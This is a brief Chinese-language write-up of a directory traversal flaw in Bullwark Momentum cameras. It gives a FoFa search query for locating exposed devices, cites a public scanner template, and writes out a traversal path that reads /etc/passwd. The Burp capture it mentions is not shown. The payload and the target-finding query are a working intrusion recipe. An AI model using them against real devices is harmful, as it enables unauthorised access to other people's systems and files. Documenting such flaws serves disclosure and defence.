Bullwark Momentum 目录遍历漏洞

Bullwark Momentum中存在一款摄像头产产品  

输入某个特定地址：即可暴露出敏感信息

参考：

https://github.com/pikpikcu/my-nuclei-templates/blob/4df022ff40f1ef7b06e29b441b1f192fba719fcd/vulnerabilities/other/bullwark-momentum-lfi.yaml

 

 

FoFa搜索：app="Bullwark Momentum"

即可找到多款产品

 

 

 

输入特定路径：

/../../../../../../../../../../../../../etc/passwd

即可暴露信息   以下为Burp抓包

 

 

 

已经暴露信息。

 

End！！！